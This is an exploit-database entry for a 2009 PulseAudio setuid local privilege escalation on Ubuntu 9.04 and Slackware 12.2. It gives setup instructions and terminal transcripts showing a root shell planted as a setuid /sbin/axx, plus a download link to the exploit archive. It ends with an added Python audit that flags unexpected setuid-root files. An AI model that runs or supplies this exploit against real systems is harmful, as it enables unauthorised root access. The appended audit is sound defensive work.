PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation

EDB-ID: 9208
Author: anonymous
Type: local
Platform: Linux
Date: 2009-07-20

PulseAudio setuid Local Privilege Escalation Vulnerability
https://www.securityfocus.com/bid/35721
Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster
--

Put the files in /tmp/pulseaudio-exp (or change config.h). They must be on the same filesystem as the pulseaudio binary.

Goes faster if you already have a pulseaudio running ? :p

Tested successfully on Ubuntu 9.04 (x86-64) and Slackware 12.2.0 (x86)

Ubuntu:
------------------------------------
$ ./c.sh
$ ./pulseaudio-exp 
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare)
# uname -a
Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12 UTC 2009 x86_64 GNU/Linux
------------------------------------
Slackware:
------------------------------------
$ ./c.sh 
$ ./pulseaudio-exp 
Please wait.
[*] Seems we are uid = 0 and gid = 0
[*] mv /tmp/pulseaudio-exp/shell /sbin/axx
[*] chown root.root /sbin/axx
[*] chmod 4755 /sbin/axx
Try: /sbin/axx /bin/sh
$ /sbin/axx /bin/sh
sh-3.1# id
uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt)
sh-3.1# uname -a
Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008 i686 Intel(R) Pentium(R) Dual  CPU  T3400  @ 2.16GHz GenuineIntel GNU/Linux
------------------------------------

download:  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/9208.tar.gz (2009-pulseaudio-exp.tar.gz)

# milw0rm.com [2009-07-20]
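
Added example, not part of the original readme or the exploit archive: a Python audit for the two host-side conditions the text above mentions, a setuid-root binary that shares a filesystem with a user-writable directory, and a new setuid-root file such as the /sbin/axx left behind in both transcripts. The device ids, the baseline set and the /usr/bin paths are constructed assumptions.

```python
import os
import stat
from collections import namedtuple

# One record per file: path, st_mode, owner uid, st_dev (filesystem id).
Entry = namedtuple("Entry", "path mode uid dev")

def collect(roots):
    """Walk real directories and yield an Entry per regular file."""
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable; skip it
                if stat.S_ISREG(st.st_mode):
                    yield Entry(path, st.st_mode, st.st_uid, st.st_dev)

def audit(entries, baseline, writable_devs):
    """Return (unexpected, exposed) lists of setuid-root paths.

    unexpected: setuid-root files absent from the known-good baseline.
    exposed:    baseline setuid-root files whose filesystem also holds a
                user-writable directory such as /tmp.
    """
    unexpected, exposed = [], []
    for e in entries:
        if e.uid != 0 or not e.mode & stat.S_ISUID:
            continue  # only setuid files owned by root matter here
        if e.path not in baseline:
            unexpected.append(e.path)
        elif e.dev in writable_devs:
            exposed.append(e.path)
    return unexpected, exposed

# Constructed sample: device ids, paths and baseline are made up for illustration.
SAMPLE = [
    Entry("/usr/bin/pulseaudio", 0o104755, 0, 2049),  # setuid root, same fs as /tmp
    Entry("/usr/bin/passwd",     0o104755, 0, 2050),  # setuid root, separate fs
    Entry("/sbin/axx",           0o104755, 0, 2049),  # artifact from the transcripts
    Entry("/bin/ls",             0o100755, 0, 2049),  # root-owned but not setuid
]
BASELINE = {"/usr/bin/pulseaudio", "/usr/bin/passwd"}

if __name__ == "__main__":
    print(audit(SAMPLE, BASELINE, writable_devs={2049}))
    # Live host (assumed paths): entries = collect(["/sbin", "/usr/bin"]),
    # writable_devs = {os.stat("/tmp").st_dev}
```

A baseline taken from the distribution's package database keeps the "unexpected" list meaningful; an "exposed" hit is a reason to move /tmp and other user-writable directories onto their own filesystem.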